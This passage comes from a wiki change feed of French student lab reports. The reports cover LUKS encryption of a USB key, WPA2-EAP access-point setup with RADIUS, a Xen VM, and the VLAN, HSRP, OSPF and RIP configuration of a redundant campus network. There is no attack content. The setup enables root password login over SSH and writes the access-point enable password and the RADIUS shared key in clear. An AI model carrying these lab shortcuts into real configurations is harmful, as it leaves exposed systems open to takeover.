 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Load_balancers.png&amp;diff=52109</id>
		<title>Fichier:Load balancers.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Load_balancers.png&amp;diff=52109"/>
				<updated>2020-01-26T22:32:01Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52108</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52108"/>
				<updated>2020-01-26T22:29:06Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
